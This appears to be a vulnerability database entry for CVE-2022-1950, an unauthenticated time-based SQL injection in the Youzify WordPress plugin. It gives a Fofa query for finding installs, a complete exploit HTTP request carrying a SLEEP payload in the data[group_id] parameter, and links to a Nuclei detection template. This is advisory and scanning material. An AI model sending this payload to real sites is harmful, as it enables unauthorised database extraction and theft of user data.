| Title | Youzify < 1.2.0 - Unauthenticated SQLi |
|---|---|
| Author | DhiyaneshDK |
| Severity | Critical |
| Impact | Unauthenticated attackers can execute time-based blind SQL injection via AJAX actions to extract database contents, potentially exposing all Youzify media and user data. |
| Remediation | Fixed in 1.2.0 |
| CVSS Score | 9.8 |
| EPSS Score | 0.57136 |
| CVE ID | CVE-2022-1950 |
| CWE ID | CWE-89 |
| Fofa Query | body="/wp-content/plugins/youzify" |
| Tags | cve cve2022 youzify wp wp-plugin wordpress sqli time-based-sqli vkev vuln |
The Youzify WordPress plugin before 1.2.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Content-Length: 113
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=(SELECT 7958 FROM (SELECT(SLEEP(6)))XVfJ)
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1950.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-1950.pcap
N/AN/A